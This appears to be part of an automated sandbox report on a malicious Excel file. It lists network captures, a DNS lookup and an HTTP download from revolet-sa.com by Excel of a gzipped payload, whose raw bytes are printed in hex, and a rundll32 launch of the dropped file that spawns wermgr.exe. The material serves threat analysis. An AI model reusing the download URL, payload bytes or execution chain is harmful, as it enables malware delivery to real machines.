Apr 7, 2021 07:16:29.088344097 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088352919 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.088371038 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088381052 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.088397980 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088407040 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.088423967 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088440895 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.088445902 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088459969 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.088469982 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088493109 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.088495970 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088521957 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088541985 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.088550091 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088573933 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088577032 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.088598013 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088603020 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.088623047 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088634014 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.088649988 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088660002 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.088675022 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088699102 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.088699102 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088726044 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088743925 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.088753939 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088778973 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.088778973 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088805914 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088816881 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.088830948 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088850975 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.088857889 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088884115 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088884115 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.088912010 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088923931 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.088936090 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088963032 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.088973045 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.088999033 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.089004040 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.089024067 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.089035034 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.089045048 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.089067936 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.089070082 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.089097977 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.089102030 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.089124918 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.089144945 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:29.089144945 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:29.089190006 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:33.940403938 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:33.940540075 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:17:04.018184900 CEST	80	49715	192.232.249.186	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 7, 2021 07:16:04.906841040 CEST	54513	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:16:04.918051004 CEST	62044	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:16:04.920567036 CEST	53	54513	8.8.8.8	192.168.2.6
Apr 7, 2021 07:16:04.931221962 CEST	53	62044	8.8.8.8	192.168.2.6
Apr 7, 2021 07:16:05.988560915 CEST	63791	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:16:06.001921892 CEST	53	63791	8.8.8.8	192.168.2.6
Apr 7, 2021 07:16:06.722475052 CEST	64267	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:16:06.736036062 CEST	53	64267	8.8.8.8	192.168.2.6
Apr 7, 2021 07:16:07.532565117 CEST	49448	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:16:07.545660973 CEST	53	49448	8.8.8.8	192.168.2.6
Apr 7, 2021 07:16:08.165395975 CEST	60342	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:16:08.178951025 CEST	53	60342	8.8.8.8	192.168.2.6
Apr 7, 2021 07:16:08.866292000 CEST	61346	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:16:08.879756927 CEST	53	61346	8.8.8.8	192.168.2.6
Apr 7, 2021 07:16:09.626563072 CEST	51774	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:16:09.638290882 CEST	53	51774	8.8.8.8	192.168.2.6
Apr 7, 2021 07:16:10.542618036 CEST	56023	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:16:10.555278063 CEST	53	56023	8.8.8.8	192.168.2.6
Apr 7, 2021 07:16:11.867266893 CEST	58384	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:16:11.880800962 CEST	53	58384	8.8.8.8	192.168.2.6
Apr 7, 2021 07:16:14.591911077 CEST	60261	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:16:14.603878975 CEST	53	60261	8.8.8.8	192.168.2.6
Apr 7, 2021 07:16:20.219337940 CEST	56061	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:16:20.232413054 CEST	53	56061	8.8.8.8	192.168.2.6
Apr 7, 2021 07:16:21.430227995 CEST	58336	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:16:21.443814039 CEST	53	58336	8.8.8.8	192.168.2.6
Apr 7, 2021 07:16:21.859357119 CEST	53781	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:16:21.908768892 CEST	53	53781	8.8.8.8	192.168.2.6
Apr 7, 2021 07:16:22.331413984 CEST	54064	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:16:22.353082895 CEST	53	54064	8.8.8.8	192.168.2.6
Apr 7, 2021 07:16:22.877445936 CEST	52811	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:16:22.890794039 CEST	53	52811	8.8.8.8	192.168.2.6
Apr 7, 2021 07:16:23.348472118 CEST	54064	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:16:23.362236977 CEST	53	54064	8.8.8.8	192.168.2.6
Apr 7, 2021 07:16:23.969026089 CEST	55299	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:16:23.981221914 CEST	53	55299	8.8.8.8	192.168.2.6
Apr 7, 2021 07:16:24.467433929 CEST	54064	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:16:24.487905025 CEST	53	54064	8.8.8.8	192.168.2.6
Apr 7, 2021 07:16:26.024410963 CEST	63745	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:16:26.037914038 CEST	53	63745	8.8.8.8	192.168.2.6
Apr 7, 2021 07:16:26.473149061 CEST	54064	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:16:26.486202955 CEST	53	54064	8.8.8.8	192.168.2.6
Apr 7, 2021 07:16:27.724608898 CEST	50055	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:16:27.737833023 CEST	53	50055	8.8.8.8	192.168.2.6
Apr 7, 2021 07:16:30.814441919 CEST	54064	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:16:30.827274084 CEST	53	54064	8.8.8.8	192.168.2.6
Apr 7, 2021 07:16:33.735830069 CEST	61374	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:16:33.748338938 CEST	53	61374	8.8.8.8	192.168.2.6
Apr 7, 2021 07:16:35.500185013 CEST	50339	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:16:35.520994902 CEST	53	50339	8.8.8.8	192.168.2.6
Apr 7, 2021 07:16:37.324681997 CEST	63307	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:16:37.340881109 CEST	53	63307	8.8.8.8	192.168.2.6
Apr 7, 2021 07:16:38.112287998 CEST	49694	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:16:38.125947952 CEST	53	49694	8.8.8.8	192.168.2.6
Apr 7, 2021 07:16:39.101572037 CEST	54982	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:16:39.114901066 CEST	53	54982	8.8.8.8	192.168.2.6
Apr 7, 2021 07:17:07.838742971 CEST	50010	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:17:07.852027893 CEST	53	50010	8.8.8.8	192.168.2.6
Apr 7, 2021 07:17:09.966517925 CEST	63718	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:17:09.985498905 CEST	53	63718	8.8.8.8	192.168.2.6
Apr 7, 2021 07:17:41.720629930 CEST	62116	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:17:41.732568979 CEST	53	62116	8.8.8.8	192.168.2.6
Apr 7, 2021 07:17:45.058247089 CEST	63816	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:17:45.083128929 CEST	53	63816	8.8.8.8	192.168.2.6
Apr 7, 2021 07:17:50.678528070 CEST	55014	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:17:50.691926956 CEST	53	55014	8.8.8.8	192.168.2.6
Apr 7, 2021 07:17:52.537348032 CEST	62208	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:17:52.557356119 CEST	53	62208	8.8.8.8	192.168.2.6
Apr 7, 2021 07:18:34.682236910 CEST	57574	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:18:34.727546930 CEST	53	57574	8.8.8.8	192.168.2.6
Apr 7, 2021 07:18:35.033094883 CEST	51818	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:18:35.045953035 CEST	53	51818	8.8.8.8	192.168.2.6
Apr 7, 2021 07:18:35.393116951 CEST	56628	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:18:35.435389996 CEST	53	56628	8.8.8.8	192.168.2.6
Apr 7, 2021 07:18:35.775959015 CEST	60778	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:18:35.789486885 CEST	53	60778	8.8.8.8	192.168.2.6
Apr 7, 2021 07:18:36.137505054 CEST	53799	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:18:36.150707006 CEST	53	53799	8.8.8.8	192.168.2.6
Apr 7, 2021 07:18:36.813541889 CEST	54683	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:18:36.852005959 CEST	53	54683	8.8.8.8	192.168.2.6
Apr 7, 2021 07:18:37.026865005 CEST	59329	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:18:37.039906979 CEST	53	59329	8.8.8.8	192.168.2.6
Apr 7, 2021 07:18:37.121356010 CEST	64021	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:18:37.135021925 CEST	53	64021	8.8.8.8	192.168.2.6
Apr 7, 2021 07:18:37.272774935 CEST	56129	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:18:37.286901951 CEST	53	56129	8.8.8.8	192.168.2.6
Apr 7, 2021 07:18:37.518021107 CEST	58177	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:18:37.530704975 CEST	53	58177	8.8.8.8	192.168.2.6
Apr 7, 2021 07:18:37.994307041 CEST	50700	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:18:38.007410049 CEST	53	50700	8.8.8.8	192.168.2.6
Apr 7, 2021 07:18:38.280806065 CEST	54069	53	192.168.2.6	8.8.8.8
Apr 7, 2021 07:18:38.293776035 CEST	53	54069	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 7, 2021 07:16:27.724608898 CEST	192.168.2.6	8.8.8.8	0x611b	Standard query (0)	revolet-sa.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 7, 2021 07:16:27.737833023 CEST	8.8.8.8	192.168.2.6	0x611b	No error (0)	revolet-sa.com		192.232.249.186	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

revolet-sa.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49715	192.232.249.186	80	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Apr 7, 2021 07:16:27.901808023 CEST	235	OUT	GET /files/countryyelow.php HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: revolet-sa.com Connection: Keep-Alive
Apr 7, 2021 07:16:28.287130117 CEST	237	IN	HTTP/1.1 200 OK Date: Wed, 07 Apr 2021 05:16:27 GMT Server: Apache Content-Disposition: attachment; filename="k9G1a.fbx" Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Vary: Accept-Encoding Content-Encoding: gzip Keep-Alive: timeout=5, max=75 Transfer-Encoding: chunked Content-Type: application/octet-stream Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 72 7f 60 53 d5 dd f7 49 72 9b 5e da 94 dc 62 a3 55 aa d6 c7 b8 e1 40 45 83 0a 6f c1 55 ed 2d 6c 23 78 af 91 04 84 b6 fa 08 31 de b9 0d 35 17 70 52 2c 0b d5 de 1d e2 d8 86 cf dc 04 05 c5 4d 37 37 9d 43 ed 36 27 a1 ed 5a 3a 19 a2 22 14 01 ad 5a f5 60 a3 06 a9 50 34 70 de ef b9 37 c9 4d 42 da 3d ef df af 85 dc 7b ee f9 7e 3e df 1f 9f ef c7 7b e3 5a 64 43 08 71 f0 a3 14 a1 76 64 fc d5 a2 ff fc 37 0c bf b1 e7 fe 6d 2c da 32 e6 df e7 b5 5b 66 ff fb bc 1b 42 b7 dd 55 bd e4 ce 1f dd 7a e7 cd 3f a8 be e5 e6 1f fe f0 47 e1 ea ff 5e 5c 7d a7 fa c3 ea db 7e 58 5d 77 9d af fa 07 3f 5a b4 f8 e2 b2 b2 12 77 2a c7 c9 eb ba e7 fc ed e2 27 cf 4e ff e2 97 fe fd ec 47 53 e7 07 e1 d7 07 df 4f e9 df 4f 9d 7d db 25 4f 9e 3d ed b2 df 9e bd 09 be af bf f4 b1 b3 cf d3 df 8f 9f 3d 11 de d6 09 7f 3a fb ef fa f7 d3 c6 fb b6 5b 42 2c c7 48 bd 4b 22 42 b3 2d 76 f4 cb ef dd 7e 53 fa ae 1f 8d 3d af 14 ee 50 0b a8 51 6b d7 ef ae 9a 6a 41 48 80 c3 5a a6 10 9c 04 fd a9 eb 85 90 f9 46 bb 4a 0c 1c fc 59 91 01 35 be 85 cc 3d 7b d5 de 5c 84 7c fa 97 1d 71 16 a4 d7 79 52 c8 64 31 ff 6e 2a 41 8b 1a 8d ba 55 ff 8b 5d a4 ff 2a c6 d8 91 c0 8f 1c bf 38 bc 78 79 18 de 57 a8 9c d1 50 0b 97 e9 2f fd 57 0d d5 2f be 73 d1 cd e1 9b 11 fa e5 6b 46 0f 20 4e 5a 83 cc 5f 2d fc bf d8 80 a1 27 57 c3 63 49 91 61 1c f6 ce c5 c5 2e be cd 00 56 5e ca 6e ec 06 ee d9 02 b8 3b ef ba f3 16 96 4f 48 ed a0 1a de 89 53 70 b5 17 df b9 f8 f6 1f 01 f0 e2 c5 48 d7 0a 2d 81 b7 50 92 8f bb 66 64 25 be fe fb fa ef eb bf af ff be fe fb fa ef eb bf af ff be fe fb fa ef eb bf af ff fe ff fa 6b ff 4b 13 27 90 1b ab 2d 48 96 37 ad 59 59 24 44 16 c7 91 5f 13 13 8a 25 2a 26 1a 25 85 57 90 a6 26 c9 be a9 1c c2 5e 1e ee 24 72 d1 56 2b dc c5 5b 16 27 51 d4 9b 20 4f 6d b3 42 68 08 8b 7c e3 22 ad 8c 25 ed ed e0 10 0d bb 39 46 96 c9 df 80 1a e9 12 e0 6e 2e 8e cb 72 54 1c 96 14 bb 62 25 f7 b1 94 22 8f bd c3 1a 3c 92 da 2c 2e c3 83 b0 4c 7e 92 c3 8b 8a 49 49 29 55 6c e4 3a 9d 96 ec ed d4 91 70 23 93 79 85 90 1c b9 20 0f c9 c9 e4 e2 42 c8 22 f2 d5 95 b9 c8 22 99 70 85 90 76 f2 5a 1e d2 2e 93 b7 ae cc 45 9e 94 14 ab 52 4c 7e 07 d7 41 2c 9e ec ed 74 6e ad 73 73 fa a5 4c fe 58 08 cc 93 1f 9f 0a e6 65 d2 92 01 b7 f7 b2 35 fd e5 1c 58 93 5f 99 4e 7e c5 db 10 4e cc d7 d4 84 27 56 93 d0 c4 64 d8 89 77 92 77 7a ac a8 c7 3e 75 2d 27 e0 6e 58 48 66 1b 9d 50 ca 13 93 24 89 aa 55 54 ad a4 6a 05 55 05 aa 3a 42 09 80 92 f5 21 84 1a 3a aa 90 1f 1f 26 15 00 3f 5a e7 e6 2d e1 62 3f 59 00 45 e6 e3 ee 46 28 7f a8 e9 75 2b 6a af 06 78 67 4a 0d 05 31 3d ac 8a 45 26 37 58 6c 4c 92 48 57 a5 a1 4a a8 fa 8e 22 41 41 f0 8f 63 e1 cb 21 1c e9 aa 32 85 4c 53 61 c5 67 e6 53 dd 26 15 c2 5f a2 02 54 1b 50 61 e7 6f a3 3c ea 04 93 0a e1 ad 79 d4 93 8c 0a 35 99 09 1e 87 18 13 5b e7 1a 7a 87 26 99 6c 40 ac 1a 89 0d c6 58 5c 80 3d d9 64 03 e2 da 0c bb fd 08 5b 5b b2 0a d6 26 6f 5a b3 b2 48 88 2c 8e 23 bf 26 26 14 4b 54 4c 34 b2 ac 3c 64 b5 cb 9a 9a 24 0e 36 91 97 87 bc 10 93 48 cf df ad 48 53 e3 2d 8b 93 28 ea 4d 90 6b 5f b6 42 74 08 8b 7c 66 af 50 40 9f 7c 8a 59 1d Data Ascii: 1faar`SIr^bU@EoU-l#x15pR,M77C6'Z:"Z`P4p7MB={~>{ZdCqvd7m,2[fBUz?G^\}~X]w?Zw'NGSOO}%O==:[B,HK"B-v~S=PQkjAHZFJY5={\\|qyRd1nAU]8xyWP/W/skF NZ_-'WcIa.V^n;OHSpH-Pfd%kK'-H7YY$D_%&%W&^$rV+['Q OmBh\|"%9Fn.rTb%"<,.L~II)Ul:p#y B""pvZ.ERL~A,tnssLXe5X_N~N'Vdwwz>u-'nXHfP$UTjU:B!:&?Z-b?YEF(u+jxgJ1=E&7XlLHWJ"AAc!2LSagS&_TPao<y5[z&l@X\=d[[&oZH,#&&KTL4<d$6HHS-(Mk_Bt\|fP@\|Y
Apr 7, 2021 07:16:28.287158012 CEST	238	IN	Data Raw: ec f8 4f 6a 2d dc 3b b8 ef 29 88 e5 f7 3e d5 64 03 e2 fe 91 d8 60 c7 ef 17 60 4f 37 d9 80 f8 4e 86 dd 7e ee 4d 30 b9 f5 3f 4d 3e 46 9f 7c 1c b5 66 4f fe ef bf e5 4c fe 9d 7f 8c 38 79 ad 59 7d 8c 4c 5e 39 99 a9 fe 3d 56 7d f5 f8 ff 50 bd 44 af be Data Ascii: Oj-;)>d``O7N~M0?M>F\|fOL8yY}L^9=V}PDdNr%2yL.e%:BxDwSEm2`K&a/c]wm.ZkhE>V&#I2yjL6 JdrB#eR}Dcm'ky^dR!\|~!
Apr 7, 2021 07:16:28.287175894 CEST	239	IN	Data Raw: db 36 6d 6e a2 95 62 a9 5a 6b 26 4b 97 80 e4 b6 d7 b4 b9 c3 d1 8a b1 3f 2d 6e 13 4b 9d 2f 5a b1 9a 88 2c 4e a2 e8 94 fb b0 38 6c 3b 8c 91 6d 5b 4b 73 29 0a bb 71 df c4 06 10 34 3e 68 c3 0d f1 9f 56 d5 ac de 1f 2e 9b 7a ae 3a 86 8a c9 99 2d df 46 Data Ascii: 6mnbZk&K?-nK/Z,N8l;m[Ks)q4>hV.z:-F!H-kjonCJ*EaC\S#;7zm}:uR4S+<C(\$t1!IaQn-cQn1v[bu^-v-yWnGn_pJScn[]n5
Apr 7, 2021 07:16:28.287195921 CEST	241	IN	Data Raw: cc 5a c4 a5 9f 77 30 4f 91 31 fa 79 80 99 89 9c a8 64 e7 03 cc 45 e4 30 3b 8b 71 fc 8a a4 5b c7 f2 39 a5 92 11 2b 26 a7 eb 9c b8 1e b8 e2 2c 0e 29 cc c0 13 3f 85 ba 3a 81 dc 79 58 07 ef 06 00 4f 0e 55 9a e0 31 67 e9 49 21 24 91 81 cb 40 7b 68 10 Data Ascii: Zw0O1ydE0;q[9+&,)?:yXOU1gI!$@{hcHWh+v[DPB?f*gD<^J,ZL.b9(ylb"sL229wIxE"S-B:nb5%3)K_@J"+Jg3LWN~I'&-K7%
Apr 7, 2021 07:16:28.287225008 CEST	242	IN	Data Raw: b2 34 f2 4e 13 39 96 8c 31 91 ff 4c 21 43 19 e4 2c 13 e9 24 ef 6c cc 20 1f 4e 23 33 d5 cf 31 91 02 79 de 44 de 91 42 ce cb 20 87 36 65 90 e5 04 9b c8 99 29 e4 a4 4c f5 7f 01 12 50 e3 18 9a dc 6c 22 cf 4e 21 13 4b d3 c8 8d 66 ce d3 c8 95 26 f2 c8 Data Ascii: 4N91L!C,$l N#31yDB 6e)LPl"N!Kf&#r e&P`C2aviw>>fAsm~8,[LZz-,5mq:y-<-.*JE&=e3d<wxd55.XA~^HC!kj"83=QwbvxM
Apr 7, 2021 07:16:28.287251949 CEST	243	IN	Data Raw: d7 72 42 8f 3d b6 8e 13 70 77 53 63 ba 8b 54 ad 5b 07 29 cd d4 5a 68 d6 8a 6c 5b 28 87 88 0d dc 1e 76 3b 48 a5 64 43 6c c2 36 48 d2 d9 fe 24 eb e0 2c e8 20 12 af f5 07 f0 71 82 3f b7 a2 e8 b2 85 ca 18 bc 93 dc b2 87 d2 a8 f7 00 e9 29 e2 8c 66 bc Data Ascii: rB=pwScT[)Zhl[(v;HdCl6H$, q?)f]pzwtIyF?<p_8s)gymJ%#f'.;[PT'>b?nBH"+K@gIch%hg=8e- dK!zN6Y)}d3;b9(-EVJK
Apr 7, 2021 07:16:28.287273884 CEST	244	IN	Data Raw: a7 cd d7 4f 8e c0 86 be 5e 28 c0 5e 92 b3 ca 75 23 b1 61 57 cb 0b b0 c3 39 db f4 67 d8 2c cc 4b c6 33 b4 3c 67 8f 97 9e 34 74 e4 73 41 2b 4c 90 5d 26 8e c2 a0 16 13 54 2c 93 8f 4e 14 04 ad 36 41 bc 4c 3a 0a 83 da 4c d0 18 d8 7f 61 d0 1a 13 54 02 Data Ascii: O^(^u#aW9g,K3<g4tsA+L]&T,N6AL:LaT5A23A\yb$eL/+ueg!3X\|4<&dr8ef2y.Y&\&l*VLd`-&s3'7tT"v,C<kO!X %YG:Bq&uTAN 7
Apr 7, 2021 07:16:28.287327051 CEST	245	IN	Data Raw: 31 66 61 30 0d 0a af 84 de 95 29 58 29 93 ba 2f 73 84 7e be 25 a7 da a5 05 aa 15 10 7a b7 29 34 a4 3c 7c 3c 2d 34 78 53 8e b0 54 62 52 41 92 32 06 4a 5a 64 f2 da f1 54 c9 4a c5 42 61 e0 b3 8e c0 b7 c8 f7 76 70 85 08 56 99 6c cc 23 1c fa 7c 34 82 Data Ascii: 1fa0)X)/s~%z)4<\|<-4xSTbRA2JZdTJBavpVl#\|4M&?#JdrU\BH&'&w03IXb+^&L]gK#pY}e{sVr+l0[5\|W/]5ArJG%#'
Apr 7, 2021 07:16:28.287357092 CEST	247	IN	Data Raw: b8 cd 10 2f 49 cc 45 b1 e8 3e 11 72 19 0b a9 64 29 c5 54 0d 31 55 54 74 18 15 96 43 05 b6 2e 0b 53 e7 45 92 5a d7 54 b6 ae 4a 82 de 4b ad ab 02 39 b7 c2 44 52 a8 c5 6c 08 d4 b8 9f 64 af df b9 55 74 b0 8a 52 54 74 84 56 a7 f2 5a 15 24 93 a6 74 de Data Ascii: /IE>rd)T1UTtC.SEZTJK9DRldUtRTtVZ$tA\|7/beMwh[(,`krBREO]cGIu9_C(W2LP)cf: nS`w}7]npd]S7rHTy9\|Q$^
Apr 7, 2021 07:16:28.287563086 CEST	248	IN	Data Raw: f5 1a ce e0 42 37 e4 b4 fb e2 9e 51 da 85 25 fc 6a 4f 6e bb fd af e6 98 39 8f 00 d2 07 f3 08 cf 8c 4a 28 92 c9 e5 79 84 95 b9 84 a8 78 92 81 61 6c c5 2e 13 1e c0 41 2c 9e 34 d5 9f 97 1e 87 57 78 99 90 37 47 19 07 e2 db df cc 2d 56 6e 16 f3 c4 24 Data Ascii: B7Q%jOn9J(yxal.A,4Wx7G-Vn$IR,JLTvff"8!xP3)g4vQZ0"3`> K<X+snR(dh&cqpAl_J}71)\|Yo4.OC-l)
Apr 7, 2021 07:16:28.447206020 CEST	250	IN	Data Raw: 14 09 ce 42 90 bc a7 7e f6 ba 0d 9c d0 53 2f 2d 67 2f fb 00 64 c4 dd e9 62 bd 1d 1c 82 9c a4 02 ce 47 eb dc bc 25 5c ec 27 fc 23 56 34 1f 30 10 6b b7 29 50 fa dd bf 30 bd 04 00 06 34 75 20 95 a3 7e 52 8f 98 84 a1 d1 b1 be f1 b1 d6 98 26 26 c2 b5 Data Ascii: B~S/-g/dbG%\'#V40k)P04u ~R&&Q1_M<!Kg#m[2zblQ@e.@j'$5}l$dM\gE:*+b2,N0M2muU)V[{9]bR kjT39pyml^yM

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 1908 Parent PID: 792

General

Start time:	07:16:20
Start date:	07/04/2021
Path:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase:	0x1110000
File size:	27110184 bytes
MD5 hash:	5D6638F2C8F8571C593999C58866007E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4264 Parent PID: 1908

General

Start time:	07:16:29
Start date:	07/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32 ..\sdbybsd.fds,StartW
Imagebase:	0x1060000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: wermgr.exe PID: 5620 Parent PID: 4264

General

Start time:	07:16:31
Start date:	07/04/2021
Path:	C:\Windows\System32\wermgr.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\wermgr.exe
Imagebase:
File size:	209312 bytes
MD5 hash:	FF214585BF10206E21EA8EBA202FACFD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: rundll32.exe PID: 4264 Parent PID: 1908 rundll32.exeCOMMON

Executed Functions

Function 04DC1030, Relevance: 18.4, APIs: 12, Instructions: 362libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(04DC4054,04DC4040), ref: 04DC1047
GetProcAddress.KERNEL32(00000000), ref: 04DC104E

Part of subcall function 04DC1B30: SetLastError.KERNEL32(0000000D,?,04DC1070,?,00000040), ref: 04DC1B3D

SetLastError.KERNEL32(000000C1), ref: 04DC1096

Memory Dump Source

